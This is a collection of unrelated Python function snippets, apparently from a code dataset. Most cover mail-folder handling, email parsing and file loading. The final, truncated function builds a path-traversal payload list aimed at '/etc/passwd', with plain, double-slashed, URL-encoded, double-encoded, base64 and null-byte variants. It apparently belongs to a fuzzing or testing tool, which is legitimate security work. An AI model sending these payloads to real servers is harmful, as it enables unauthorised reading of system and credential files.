cfg.items(section):\n l = var.split(None, 1)\n if l[0] != 'process':\n continue\n found = True\n incoming_folder = l[1]\n yield (incoming_folder, rules_name)\n if not found:\n yield ('incoming', 'incoming')\n\n for incoming_folder, rules_name in g():\n log.info(\n 'Incoming folder %r using rules %r',\n incoming_folder,\n rules_name,\n )\n incoming_path = os.path.join(depot, incoming_folder)\n for path in maildir.walk(incoming_path):\n # default folder if nothing matches\n folder = 'INBOX'\n\n for k,v in cfg.items('rules %s' % rules_name):\n k = k % dict(\n colon=':',\n equals='=',\n )\n log.debug('Rule %s = %s', k, v)\n l = k.split(None)\n name = l[0]\n\n data = matcher.call_matcher(\n name=name,\n cfg=cfg,\n depot=depot,\n folder=incoming_folder,\n path=path,\n args=l[1:],\n )\n\n if data is not None:\n log.debug('Matcher data: %r', data)\n folder = v.strip() % data\n break\n\n maildir.create(os.path.join(depot, folder))\n old_path = os.path.join(\n incoming_path,\n path,\n )\n new_path = os.path.join(\n depot,\n folder,\n path,\n )\n log.debug('Move %s to %s', old_path, new_path)\n try:\n os.rename(old_path, new_path)\n except OSError, e:\n if e.errno == errno.ENOENT:\n # lost a race\n pass\n else:\n raise", "def process_message(mail):\n\tmessage = email.message_from_string(mail)\t#parsing metadata\n\tdatetuple = email.utils.parsedate_tz(message.__getitem__('Date'))\n\tfiledirectory = basedirectory\n\tif not datetuple:\n\t\tdatetuple = 
email.utils.parsedate_tz(message.__getitem__('Delivery-date'))\n\tif directory_for_year: \n\t\tfiledirectory = os.path.join(filedirectory, str(datetuple[0]))\n\tif directory_for_month:\n\t\tfiledirectory = os.path.join(filedirectory, str(datetuple[1])) \n\tdateposix = email.utils.mktime_tz(datetuple)\n\tlocaldate = datetime.datetime.fromtimestamp(dateposix)\n\tdatestring = localdate.strftime('%Y%m%d-%H%M') # +'-'+'-'.join(time.tzname) #\n\tsender = email.utils.parseaddr(message['To'])[1].replace('@','_').replace('.','-')\n\tsubject = email.header.decode_header(message['Subject'])[0][0]\n\tfilename = datestring + '_' + sender[:60] + '_' + subject[:60]\n\n\t# parsing mail content\n\tmailstring = ''\n\tfor headername, headervalue in message.items():\n\t\tmailstring += headername + ': ' + headervalue + '\\r\\n'\t# add \\r\\n or\n\tif message.get_content_maintype() == 'text':\n\t\tmailstring += message.get_payload(decode=True)\n\n\t# handle multipart: \n\telif message.get_content_maintype() == 'multipart':\n\t\tpartcounter = 0\n\t\tfor part in message.walk():\n\t\t\tif part.get_content_maintype() == 'text':\t# also: text/html\n\t\t\t\tfor header, value in part.items():\n\t\t\t\t\tmailstring += header + ': ' + value + '\\r\\n'\n\t\t\t\t\tmailstring += '\\r\\n' + part.get_payload(decode=True) + '\\r\\n'\n\t\t\t# skip multipart containers\n\t\t\telif part.get_content_maintype() != 'multipart':\n\t\t\t\tpartcounter += 1\n\t\t\t\ttry:\n\t\t\t\t\tattachmentname = email.header.decode_header(part.get_filename())[0][0]\n\t\t\t\texcept:\n\t\t\t\t\tattachmentname = \"\"\n\t\t\t\t\tprint(\"Error when parsing filename.\")\n\t\t\t\tif not attachmentname:\n\t\t\t\t\text = mimetypes.guess_extension(part.get_content_type())\n\t\t\t\t\tif not ext:\n\t\t\t\t\t\text = '.bin'\t# use generic if unknown extension\n\t\t\t\t\tattachmentname = 'attachment' + str(partcounter) + ext\n\t\t\t\tattfilename = filename + '_' + attachmentname\n\t\t\t\twrite_to_file(filedirectory, attfilename, part.get_payload(decode=True))\n\twrite_to_file(filedirectory, filename+'.txt', mailstring)", "def _parse_cvcfolder(self, cvcfolderpath):\n cvcfoldername = os.path.basename(os.path.abspath(cvcfolderpath))\n obsfolderinfo = {}\n cvcextstr = cvcfoldername.split('_')[-1]\n if cvcextstr == 'xst' or cvcextstr == 'xst-SEPTON':\n cvcfoldername_split = cvcfoldername.split('_')\n try:\n (stnid, Ymd, HMS, rcustr, sbstr, intstr, durstr, dirstr, cvcextstr\n ) = cvcfoldername_split\n obsfolderinfo['stnid'] = stnid\n obsfolderinfo['datetime'] = datetime.datetime.strptime(\n Ymd + 'T' + HMS, '%Y%m%dT%H%M%S')\n obsfolderinfo['rcumode'] = rcustr[3:]\n obsfolderinfo['subband'] = sbstr[2:]\n obsfolderinfo['integration'] = float(intstr[3:])\n obsfolderinfo['duration_tot'] = float(durstr[3:])\n obsfolderinfo['pointing'] = dirstr[3:].split(',')\n except:\n raise ValueError(\"Foldername not in xst_ext format.\")\n elif cvcextstr == 'acc':\n dirpat = re.compile(regex_ACCfolder)\n obsdirinfo_m = dirpat.match(cvcfoldername)\n if obsdirinfo_m is None:\n print(\"Cal error\")\n raise ValueError(\n \"Calibration directory does not have correct syntax.\")\n obsdirinfo = obsdirinfo_m.groupdict()\n obsfolderinfo['stnid'] = obsdirinfo['stnid']\n d0 = datetime.datetime(int(obsdirinfo['year']),\n int(obsdirinfo['month']),\n int(obsdirinfo['day']),\n int(obsdirinfo['hour']),\n int(obsdirinfo['minute']),\n int(obsdirinfo['second']))\n obsfolderinfo['sessiontimeid'] = d0\n obsfolderinfo['rcumode'] = obsdirinfo['rcumode']\n obsfolderinfo['subband'] = '0:511'\n 
obsfolderinfo['integration'] = 1.0\n obsfolderinfo['duration_tot'] = int(obsdirinfo['duration_tot'])\n obsfolderinfo['source'] = obsdirinfo['calsrc']\n obsfolderinfo['pointing'] = \\\n ilisa.monitorcontrol.directions.std_pointings(\n obsfolderinfo['source'])\n else:\n raise ValueError(\"Folder not expected xst or acc format.\")\n obsfolderinfo['datatype'] = cvcextstr\n return obsfolderinfo", "def folder_traverse(base, message_data, pst_name, folder_name):\n for folder in base.sub_folders:\n if folder.number_of_sub_folders:\n message_data = folder_traverse(folder, message_data, pst_name, folder.name)\n message_data = check_for_messages(folder, message_data, pst_name, folder.name)\n return message_data", "def read_campaign(root_import_path):\n if os.path.isfile(os.path.join(root_import_path, campaign_filename)):\n # any missing **required** fields will make this false. spawns MISSING error. Fatal.\n #is_complete = True\n\n # any missing data will make this false. spawns a warning.\n #is_minally_ok = True\n\n # True if something wierd happens\n is_broken = False # True if something wierd happens. Fatal\n\n version = ''\n name = ''\n description_text = ''\n assoc_researchers_text = ''\n assoc_publications_text = ''\n assoc_research_grants_text = ''\n start_date_text = ''\n end_date_text = ''\n contact_person_text = ''\n\n f = open(os.path.join(root_import_path, campaign_filename))\n\n for line in f.readlines():\n\n split_string = line.rstrip().split(':')\n\n if split_string[0].lower() == 'Version'.lower():\n version = split_string[1]\n elif split_string[0].lower() == 'Name'.lower():\n name = split_string[1]\n elif split_string[0].lower() == 'Description'.lower():\n description_text = split_string[1]\n elif split_string[0].lower() == 'Associated Researchers'.lower():\n assoc_researchers_text = split_string[1]\n elif split_string[0].lower() == 'Associated Publications'.lower():\n assoc_publications_text = split_string[1]\n elif split_string[0].lower() == 'Associated Research Grants'.lower():\n assoc_research_grants_text = split_string[1]\n elif split_string[0].lower() == 'Start Date'.lower():\n start_date_text = split_string[1]\n elif split_string[0].lower() == 'End Date'.lower():\n end_date_text = split_string[1]\n elif split_string[0].lower() == 'Contact Person'.lower():\n contact_person_text = split_string[1]\n else:\n print 'ERROR: Unknown label in campaign file;', split_string[0]\n is_broken = True\n\n campaign_data = dict(#version=version,\n short_name=name,\n description=description_text,\n associated_researchers=assoc_researchers_text,\n associated_publications=assoc_publications_text,\n associated_research_grant=assoc_research_grants_text,\n date_start=start_date_text.strip(),\n date_end=end_date_text.strip(),\n contact_person=contact_person_text)\n return campaign_data\n\n else:\n print \"ERROR: Can not open the campaign.txt file.\"\n\n return False", "def parse_util_file(file_data):\n if isinstance(file_data, dict):\n if 'from' not in file_data:\n return {'from': file_data['to'], 'to': file_data['to']}\n if 'to' not in file_data:\n return {'from': file_data['from'], 'to': file_data['from']}\n\n return file_data\n\n else:\n parts = file_data.split(' ')\n if len(parts) == 1:\n return {'from': file_data, 'to': file_data}\n else:\n return {'from': parts[0], 'to': parts[1]}", "def get_files(message_filters=None, conversation_filters=None):\n\twith open(constants.CONVERSATION_DATA_FILENAME, 'r') as the_file:\n\t\tconversation_data = parse_file(the_file, 
filters=conversation_filters)\n\n\twith open(constants.MESSAGE_DATA_FILENAME, 'r') as the_file:\n\t\tmessage_data = parse_file(the_file, filters=message_filters)\n\n\treturn conversation_data, message_data", "def get_parsed_data():\n\n echonest_data_files = [f for f in os.listdir('.') if re.match(\"^echonest_[\\w]+.txt$\", f)]\n\n # Setting up header with user id and attributes\n header = ['user_id']\n header.extend(ATTRIBUTES)\n\n # printing header to standard out\n print \",\".join(header) \n\n # Processing each file to obtain parsed data\n for data_file in echonest_data_files:\n user_id = data_file[9:-4] # strip file prefix/suffix to get username/id\n parse_echonest_data_file(data_file, user_id)", "def parse_folder(self, path):\n\n for filename in os.listdir(path):\n self.parse_file(os.path.join(path, filename), filename)\n return self.country_dict, self.hre_dict, self.name_dict", "def _parse_filelist(self):\n if not os.path.exists(self.filelist):\n print \"couldn't find \",self.filelist\n return\n\n f = open( self.filelist, 'r' )\n flist = f.readlines()\n self.larlitefilelist = []\n for f in flist:\n if \".root\" in f:\n self.larlitefilelist.append( f.strip() )", "def _ExtractEmailAddressesFromOWNERS(path, depth=0):\n # It is unlikely that any chain of OWNERS files will exceed 10 redirections\n # via file:// directives.\n limit = 10\n if (depth > limit):\n raise Error('_ExtractEmailAddressesFromOWNERS has been called {} times. The'\n ' path {} may be part of an OWNERS loop.'.format(limit, path))\n\n directive = 'file://'\n email_pattern = re.compile(_EMAIL_PATTERN)\n extracted_emails = []\n\n with open(path, 'r') as owners_file:\n for line in [line.lstrip()\n for line in owners_file.read().splitlines() if line]:\n index = line.find(' ')\n first_word = line[:index] if index != -1 else line\n\n if email_pattern.match(first_word):\n extracted_emails.append(first_word)\n\n elif first_word.startswith(directive):\n next_path = _GetOwnersFilePath(\n os.path.join(SRC, first_word[len(directive):]))\n\n if os.path.exists(next_path) and os.path.isfile(next_path):\n extracted_emails.extend(\n _ExtractEmailAddressesFromOWNERS(next_path, depth + 1))\n else:\n raise Error('The path derived from {} does not exist. 
'\n 'Derived path: {}'.format(first_word, next_path))\n\n return extracted_emails", "def makeDataFileFromEmails( dir_path, out_file_path ):\n\n\twith open( out_file_path, 'w' ) as out_file:\n\n\t\t# Iterate over the files in directory 'path'\n\t\tfor file_name in os.listdir( dir_path ):\n\n\t\t\t# Open each file for reading\n\t\t\twith open( dir_path + file_name ) as in_file:\n\n\t\t\t\t# Reformat emails as a single line of text\n\t\t\t\ttext = in_file.read().replace( '\\n',' ' ).replace( '\\r', ' ' )\n\t\t\t\ttext = text + \"\\n\"\n\t\t\t\t# Write each email out to a single file\n\t\t\t\tout_file.write( text )", "def get_folder_contact_output(contact_id: Optional[pulumi.Input[str]] = None,\n folder_id: Optional[pulumi.Input[str]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetFolderContactResult]:\n ...", "def _parse_data_dir(self, data_dir):\n categories = os.listdir(data_dir)\n for folder_name in categories:\n all_fnames_list_fname = os.path.join(data_dir, folder_name,\n folder_name + \".bmf\")\n if not os.path.isfile(all_fnames_list_fname):\n raise IOError(\"Not found file {}\".format(all_fnames_list_fname))\n all_fnames_list = np.loadtxt(all_fnames_list_fname, dtype=np.str,\n skiprows=1)\n # Correct from pgm to jpg\n all_fnames_list = [f.split('.')[0]+'.jpg' for f in all_fnames_list]\n\n all_fnames_list = [os.path.join(data_dir, folder_name, f) for f \\\n in all_fnames_list]\n\n self.samples += len(all_fnames_list)\n # Append the last\n self.image_filenames.append(all_fnames_list)", "def _findFiles(self, inputfolder):\n protofile, caffemodel = None, None\n files = os.listdir(inputfolder)\n for f in files:\n name, ext = splitext(f)\n if ext == '.caffemodel':\n caffemodel = join(inputfolder, f)\n elif f == 'deploy.prototxt':\n protofile = join(inputfolder, f)\n return protofile, caffemodel", "def read_folder(self,sourceFolder):\n \n taskList = []\n for fileName in os.listdir(sourceFolder):\n if fileName.endswith(\".task\"):\n if 'HFODomain' in sourceFolder:\n taskList.append(HFOTask(sourceFolder+fileName,fileName.split('.')[0]))\n else:\n taskList.append(GridWorldTask(sourceFolder+fileName,fileName.split('.')[0]))\n return taskList", "def parse_folder(self, path):\n\n data = []\n for filename in os.listdir(path):\n data.append(self.parse_file(os.path.join(path, filename), filename))\n return data", "def userMessages(self, path, pattern):\n log(logging.DEBUG, \"Look for files at \" + path + \" with pattern \" + pattern)\n # if folder does not exist\n if not os.path.exists(path):\n return []\n # result message list\n message_list = []\n # retrieve file names\n try:\n for filename in os.listdir(path):\n log(logging.DEBUG, \"\\tFound file \" + filename)\n # only adds if name has the corresponding pattern\n if re.match(pattern, filename):\n message_list.append(filename)\n except:\n logging.exception(\"Error while listing messages in directory \" + path)\n\n messages_to_send = []\n for msg_id in message_list:\n cert = self.users[self.retrieveUserUuidFromMsgId(msg_id)]['description']['data']['certificate']\n subject_info = self.card_utils.get_certificate_subject_info(certificate_pem=cert)\n messages_to_send.append({\n 'cc_number' : subject_info['cc_number'],\n 'complete_name' : subject_info['complete_name'],\n 'msg_id' : msg_id\n })\n return messages_to_send", "def get_company_files(target_dcns):\n # directory = r\".\\PDFParsing\\parsed_files\"\n directory = r\".\\PDFParsing\\clean_txt_flat\"\n files = []\n temp = os.path.join(directory)\n list_files = 
os.listdir(temp)\n for item in list_files:\n l = item.split(\"-\")\n dcn = l[-1].rstrip(\".txt\").rstrip(\"(1)\")\n while dcn and not dcn[-1].isdigit():\n dcn = dcn[:-1]\n while dcn and not dcn[0].isdigit():\n dcn = dcn[1:]\n if dcn:\n dcn = int(dcn)\n else:\n continue\n if dcn in target_dcns:\n files.append((os.path.join(temp, item), dcn))\n return files", "def _counterparty(\n file_name: str,\n cp_name: str\n ) -> Tuple[str, List[str]]:\n with open(file_name, encoding='utf-8') as f:\n dct = json.load(f)\n root_dir = dct.pop('root_dir')\n item = dct.pop(cp_name)\n return root_dir + item['path'], item['to']", "def create_folder_structure(_user):\n flds = _user.folders\n logging.info(f\"\\nYou have ** {str(len(_user.folders))} ** \"\n f\"folders in your ArcGIS Organization\\n\")\n # listing documents in the user root folder\n root_folder_items = _user.items()\n _n = 0\n logging.info(f\"Total number of items in root folder: {str(len(root_folder_items))}\")\n\n # list of supported file types to retrieve from the user folders\n # TODO Read file_types from a external file or directly form a public Esri URL\n file_types = ['CSV', 'Service Definition', 'KML', 'ZIP', 'Shapefile',\n 'Image Collection', 'PDF', 'Microsoft Excel']\n\n # Listing & downloading items in the root folder\n for root_folder_item in root_folder_items:\n if root_folder_item.type in file_types:\n _n += 1\n item_path = str(root_folder_item.download())\n file_extension = item_path.rsplit(\".\", maxsplit=1)[1]\n file_destination = os.path.normpath(\"\".join([ARCGISBOXDIR, '/',\n root_folder_item.title,\n \".\", file_extension]))\n os.rename(str(item_path), file_destination)\n logging.info(f\"{root_folder_item.title}\\t\\t({root_folder_item.type})\\n\")\n\n # Listing documents inside other user folders\n for fld in flds:\n # logging.info((carpeta))\n logging.info(f\"Name: {fld['title']}\\n\")\n os.mkdir(os.path.normpath(\"\".join([ARCGISBOXDIR, \"/\", fld['title']])))\n flds = _user.items(folder=fld['title'])\n logging.info(f'You have {format(str(len(flds)))} items inside your folder\\n')\n for i in flds:\n if i.type in file_types:\n _n += 1\n item_path = str(i.download())\n file_extension = item_path.rsplit(\".\", maxsplit=1)[1]\n file_destination = os.path.normpath(\"\".join([ARCGISBOXDIR, \"/\",\n fld['title'], \"/\", i.title,\n \".\", file_extension]))\n logging.info(file_destination)\n os.rename(str(item_path), file_destination)\n logging.info(f\"\\t\\t {i.title} \\t\\t( {i.type} )\\n\")\n\n logging.info(f\"\\tDownloadable elements:\\t {str(_n)}\")", "def mergeFolders():\n\n result, data = mailBox.list()\n if result != \"OK\":\n print \"\\nERROR: Could not get list of folders in mailbox\\n\"\n print \"\\n* Exiting... *\\n\"\n sys.exit(1)\n\n folderList = []\n print \"\\nList of folders:\"\n print \"---------------------\"\n for item in data:\n folderName = item.split()[-1].replace(\"\\\"\", \"\")\n if not \"Gmail\" in folderName:\n folderList.append(folderName)\n print folderName\n\n srcFolder = str(raw_input(\"\\nEnter source folder name EXACTLY: \"))\n if srcFolder not in folderList:\n print \"\\nERROR: Incorrect source folder name\\n\"\n print \"\\n* Exiting... *\\n\"\n destFolder = str(raw_input(\"\\nEnter destination folder name: \"))\n if destFolder not in folderList:\n print \"\\nERROR: Incorrect destination folder name\\n\"\n print \"\\n* Exiting... 
*\\n\"\n\n uidList = search(srcFolder)\n\n result1 = \"\"\n result2 = \"\"\n flag1 = True\n flag2 = True\n result, data = mailBox.select(srcFolder, False)\n\n for item in uidList.split(\",\"):\n\n result1, data = mailBox.uid('COPY', item, destFolder)\n if result1 == \"OK\":\n result2 = delete(item, srcFolder, \"f\")\n\n if result1 != \"OK\":\n flag1 = False\n if result2 != \"OK\":\n flag2 = False\n\n if flag1 == flag2 == True:\n print \"\\n* Merge successful *\\n\"\n else:\n if flag1 == False:\n print \"\\nERROR: Could not copy to %s while merging folders\\n\" % destFolder\n if flag2 != False:\n print \"\\nERROR: Could not delete message from source folder %s\\n\" % srcFolder", "def parse_main_folder_name(main_folder_name):\n parts = main_folder_name.split('_')\n\n date = parts[0]\n raft_geometry = parts[1]\n thin_film_prop = parts[2]\n magnet_field_prop = parts[3]\n\n if len(parts) > 4:\n comments = parts[4]\n else:\n comments = 'none'\n\n return date, raft_geometry, thin_film_prop, magnet_field_prop, comments", "def get_recipients(item_container):\n if item_container.item.string_1 != '':\n user_folder = get_item_container_by_path(item_container.item.string_1)\n return get_all_users_with_email(user_folder)\n else:\n while not check_userfolder(item_container):\n item_container = item_container.get_parent()\n return get_all_users_with_email(item_container)", "def process_file(path):\r\n\ttokenset = {}\r\n\r\n\tfp = open(path, 'r')\r\n\temailMsg = email.message_from_file(fp)\r\n\tfp.close()\r\n\r\n\ttokenset = parse_body(emailMsg.get_payload().lower())\r\n\r\n\treturn tokenset", "def getFileData(self, context, manifest, filedata):\n files = context.source.listFiles()\n for fn in files:\n if 'dat' == fn.split('.')[-1]:\n data = context.source.readFile(fn)\n doc = parseDoc(data)\n root = doc.getRootElement()\n if 'CONTENT' == root.name:\n id = fn.split('.')[0]\n docfn = id + '.html'\n data = context.performTransform(data, ['Blackboard Content', 'Blackboard_content_import_xform.xsl'])\n data = data.replace('@X@EmbeddedFile.location@X@', '%s/embedded/' %id)\n filedata[docfn] = data.replace('@X@LOCALFOLDERLOCATION@X@', '%s/' %id)", "def take_action(self, parsed_args):\n folder_content = dict()\n parent = utils.key_len(parsed_args.parent)\n folder_content = self.app.metagen.directory_list(parent)\n content_type_map = {\n '1': 'Folder',\n '2': 'Sample',\n '3': 'MRSA Sample',\n '4': 'Listeria Sample'\n }\n header = ['type', 'name', 'id', 'status', 'size', 'created']\n if folder_content:\n if not folder_content['items']:\n self.logger.info('\\nFolder {} (id: {}) is empty'.format(folder_content['name'], parent))\n for_output = [[' ', ' ', ' ', ' ', ' ', ' ']]\n return (header, for_output)\n else:\n raise Exception(\"Exception uccured.\")\n\n def _set_date(inp):\n return dt.fromtimestamp((inp[1]/1000)).strftime('%Y-%m-%d %H:%M:%S')\n\n def _del_none(inp):\n out = [inp[1]]\n if not out[0]:\n out = [0 if v[1] == 'int' else '-' for k, v in field_maps.items() if inp[0] == v[0]]\n return out[0]\n\n def _set_dim(inp):\n out = inp if inp else 0\n out = utils.convert_size(out)\n return out if out is not '0B' else '-'\n\n def _set_type(inp):\n ctype = content_type_map[str(inp[1])] if content_type_map.get(str(inp[1])) else inp[1]\n return ctype\n\n def _convert(inp):\n for item in inp.items():\n for k, v in field_maps.items():\n if item[0] == v[0]:\n inp[item[0]] = field_maps[k][2](item)\n break\n return inp\n\n field_maps = {\n 'type': ['content_type', 'str', _set_type],\n 'id': ['id', 'str', _del_none],\n 
'name': ['name', 'str', _del_none],\n 'status': ['status', 'str', _del_none],\n 'size': ['size', 'int', _del_none],\n 'created': ['created', 'int', _set_date]\n }\n\n \"\"\"we need just items for output\"\"\"\n items_data = [_convert(item) for item in folder_content['items']]\n\n \"\"\"order regarding order parameters\"\"\"\n if parsed_args.order:\n if parsed_args.order.lower() in header:\n items_data = sorted(items_data,\n key=itemgetter(field_maps[parsed_args.order.lower()][0]),\n reverse=(not parsed_args.up)\n )\n for_output = [[item[field_maps[f][0]] if f is not 'size'\n else _set_dim(item[field_maps[f][0]])\n for f in header]\n for item in items_data\n ]\n self.logger.info('\\nContent of the Folder {} (id: {})'.format(folder_content['name'], parent))\n return (header, for_output)", "def _read_file_data(self, message_name_filter_list, read_until=None):\n\n if read_until is None:\n read_until = 1 << 50 # make it larger than any possible log file\n\n try:\n # pre-init reusable objects\n header = self._MessageHeader()\n msg_data = self._MessageData()\n\n curr_file_pos = self._file_handle.tell()\n\n while True:\n data = self._file_handle.read(3)\n curr_file_pos += len(data)\n header.initialize(data)\n data = self._file_handle.read(header.msg_size)\n curr_file_pos += len(data)\n if len(data) < header.msg_size:\n break # less data than expected. File is most likely cut\n\n if curr_file_pos > read_until:\n if self._debug:\n print('read until offset=%i done, current pos=%i' %\n (read_until, curr_file_pos))\n break\n\n try:\n if header.msg_type == self.MSG_TYPE_INFO:\n msg_info = self._MessageInfo(data, header)\n self._msg_info_dict[msg_info.key] = msg_info.value\n self._msg_info_dict_types[msg_info.key] = msg_info.type\n elif header.msg_type == self.MSG_TYPE_INFO_MULTIPLE:\n msg_info = self._MessageInfo(data, header, is_info_multiple=True)\n self._add_message_info_multiple(msg_info)\n elif header.msg_type == self.MSG_TYPE_PARAMETER:\n msg_info = self._MessageInfo(data, header)\n self._changed_parameters.append((self._last_timestamp,\n msg_info.key, msg_info.value))\n elif header.msg_type == self.MSG_TYPE_PARAMETER_DEFAULT:\n msg_param = self._MessageParameterDefault(data, header)\n self._add_parameter_default(msg_param)\n elif header.msg_type == self.MSG_TYPE_ADD_LOGGED_MSG:\n msg_add_logged = self._MessageAddLogged(data, header,\n self._message_formats)\n if (message_name_filter_list is None or\n msg_add_logged.message_name in message_name_filter_list):\n self._subscriptions[msg_add_logged.msg_id] = msg_add_logged\n else:\n self._filtered_message_ids.add(msg_add_logged.msg_id)\n elif header.msg_type == self.MSG_TYPE_LOGGING:\n msg_logging = self.MessageLogging(data, header)\n self._logged_messages.append(msg_logging)\n elif header.msg_type == self.MSG_TYPE_LOGGING_TAGGED:\n msg_log_tagged = self.MessageLoggingTagged(data, header)\n if msg_log_tagged.tag in self._logged_messages_tagged:\n self._logged_messages_tagged[msg_log_tagged.tag].append(msg_log_tagged)\n else:\n self._logged_messages_tagged[msg_log_tagged.tag] = [msg_log_tagged]\n elif header.msg_type == self.MSG_TYPE_DATA:\n msg_data.initialize(data, header, self._subscriptions, self)\n if msg_data.timestamp != 0 and msg_data.timestamp > self._last_timestamp:\n self._last_timestamp = msg_data.timestamp\n elif header.msg_type == self.MSG_TYPE_DROPOUT:\n msg_dropout = self.MessageDropout(data, header,\n self._last_timestamp)\n self._dropouts.append(msg_dropout)\n elif header.msg_type == self.MSG_TYPE_SYNC:\n self._sync_seq_cnt = 
self._sync_seq_cnt + 1\n else:\n if self._debug:\n print('_read_file_data: unknown message type: %i (%s)' %\n (header.msg_type, chr(header.msg_type)))\n print('file position: %i msg size: %i' % (\n curr_file_pos, header.msg_size))\n\n if self._check_packet_corruption(header):\n # seek back to advance only by a single byte instead of\n # skipping the message\n curr_file_pos = self._file_handle.seek(-2-header.msg_size, 1)\n\n # try recovery with sync sequence in case of unknown msg_type\n if self._has_sync:\n self._find_sync()\n else:\n # seek back msg_size to look for sync sequence in payload\n if self._has_sync:\n self._find_sync(header.msg_size)\n\n except IndexError:\n if not self._file_corrupt:\n print(\"File corruption detected while reading file data!\")\n self._file_corrupt = True\n\n except struct.error:\n pass #we read past the end of the file\n\n # convert into final representation\n while self._subscriptions:\n _, value = self._subscriptions.popitem()\n if len(value.buffer) > 0: # only add if we have data\n data_item = ULog.Data(value)\n self._data_list.append(data_item)\n # Sorting is necessary to be able to compare two ULogs correctly\n self.data_list.sort(key=lambda ds: (ds.name, ds.multi_id))", "def parse_bro_smtp(smtp_path, target_dir, prefix='smtp'):\n\n # the current message we're parsing in the case of multiple emails coming in over the same connection\n smtp_message_index = 0 \n\n with open(smtp_path, 'r', errors='ignore') as fp:\n source_ipv4 = None\n source_port = None\n envelope_from = None\n envelope_to = []\n\n # state flag for when the data isn't quite right (see below)\n _bypass_read = False\n\n # the first line of the file has the source IP address of the smtp connection\n # in the following format: 172.16.139.143:38668/tcp\n\n line = fp.readline()\n m = REGEX_BRO_SMTP_SOURCE_IPV4.match(line)\n\n if not m:\n logging.error(f\"unable to parse soure address from {smtp_path} ({line.strip()})\")\n event_time = saq.LOCAL_TIMEZONE.localize(datetime.datetime.fromtimestamp(os.path.getmtime(smtp_path)))\n # in this case we skip the first readline() call since we've already read it\n _bypass_read = True\n else:\n source_ipv4 = m.group(1)\n source_port = m.group(2)\n\n logging.debug(f\"got source ipv4 {source_ipv4} port {source_port} for {smtp_path}\")\n\n # the second line is the time (in epoch UTC) that bro received the file\n line = fp.readline()\n event_time = datetime.datetime.utcfromtimestamp(int(line.strip()))\n logging.debug(f\"got event time {event_time} for {smtp_path}\")\n\n STATE_SMTP = 1\n STATE_DATA = 2\n\n state = STATE_SMTP\n rfc822_path = None\n rfc822_fp = None\n\n def _reset_state():\n nonlocal rfc822_fp, source_ipv4, source_port, envelope_from, envelope_to, state\n rfc822_fp = None\n #source_ipv4 = None\n #source_port = None\n envelope_from = None\n envelope_to = []\n state = STATE_SMTP\n\n def _finalize():\n # called when we detect the end of an SMTP stream OR the end of the file (data)\n nonlocal rfc822_fp, source_ipv4, source_port, envelope_from, envelope_to, state\n rfc822_fp.close()\n logging.info(\"finished parsing {} from {}\".format(rfc822_path, smtp_path))\n result = RFC822Email(\n source_ipv4=source_ipv4,\n source_port=source_port,\n envelope_from=envelope_from,\n envelope_to=envelope_to,\n received=event_time,\n file_path=rfc822_path)\n _reset_state()\n return result\n\n # smtp is pretty much line oriented\n while True:\n\n # if we read the first line and it wasn't what we expected\n # then we skip reading it here since we already have it\n if 
_bypass_read:\n _bypass_read = False\n else:\n line = fp.readline()\n\n if line == '':\n break\n\n if state == STATE_SMTP:\n m = REGEX_BRO_SMTP_MAIL_FROM.match(line)\n if m:\n envelope_from = m.group(1)\n logging.debug(\"got envelope_from {} for {}\".format(envelope_from, smtp_path))\n continue\n\n m = REGEX_BRO_SMTP_RCPT_TO.match(line)\n if m:\n envelope_to.append(m.group(1))\n logging.debug(\"got envelope_to {} for {}\".format(envelope_to, smtp_path))\n continue\n\n m = REGEX_BRO_SMTP_DATA.match(line)\n if m or (not line.startswith('<') and not line.startswith('>')):\n state = STATE_DATA\n rfc822_path = os.path.join(target_dir, f'{prefix}.{smtp_message_index}.email.rfc822')\n smtp_message_index += 1\n rfc822_fp = open(rfc822_path, 'w')\n logging.debug(\"created {} for {}\".format(rfc822_path, smtp_path))\n continue\n\n m = REGEX_BRO_SMTP_RSET.match(line)\n if m:\n logging.debug(f\"detected RSET for {smtp_path}\")\n _reset_state()\n continue\n\n # any other command we skip\n logging.debug(f\"skipping SMTP command {line.strip()}\")\n continue\n\n # otherwise we're reading DATA and looking for the end of that\n if line.strip() == ('> . .'):\n yield _finalize()\n continue\n\n rfc822_fp.write(line)\n continue\n\n # did the file end while we were reading SMTP data?\n if state == STATE_DATA:\n yield _finalize()", "def get_contacts(filename):\n \n \n emails = []\n with open(filename, mode='r') as contacts_file:\n for a_contact in contacts_file:\n\n emails.append(a_contact.split()[0])\n return emails", "def process(self, incomings):\n\n payloads = []\n\n payloads.append([\"../../../../../../../../var/www/attacker.com/public_html/\", \"image.jpg\"])\n payloads.append([\"L2V0Yy9wYXNzd2Q=\"])\n payloads.append([\"TDJWMFl5OXdZWE56ZDJRPQ%3D%3D\"])\n\n #Contains the various types of directory pathing\n #%2f = / || %2e = . 
|| %252f = / || '%255c' = \\\n list_of_postfix_1 = ['/etc','/etc/', '/etc/passwd', '%2fetc%2fpasswd','/etc/passwd%00index.html', '/etc/passwd;index.html','//etc//passwd','L2V0Yy9wYXNzd2Q%3D']\n list_of_prefix = ['../','..././','./../','.../','..../','...//','....\\\\/','..../\\\\\\\\']\n\n #Print just the postfix\n for post_style in list_of_postfix_1:\n payloads.append([post_style])\n\n #New Postfix array (Without the last '/')\n list_of_postfix = ['','etc/passwd']\n\n #For extended file paths (Non-encoded)\n for post_style in list_of_postfix:\n for pre_style in list_of_prefix:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Double-slashed)\n list_of_postfix_doubleslash = ['','etc//passwd']\n list_of_prefix_doubleslash = ['..//']\n\n for post_style in list_of_postfix_doubleslash:\n for pre_style in list_of_prefix_doubleslash:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Encoded)\n list_of_postfix_encoded = ['','etc%2fpasswd']\n list_of_prefix_encoded = ['%2e%2e%2f']\n\n for post_style in list_of_postfix_encoded:\n for pre_style in list_of_prefix_encoded:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Doubly-encoded)\n list_of_postfix_d_encoded = ['','etc%252fpasswd']\n list_of_prefix_d_encoded = ['%252e%252e%252f']\n\n for post_style in list_of_postfix_d_encoded:\n for pre_style in list_of_prefix_d_encoded:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n 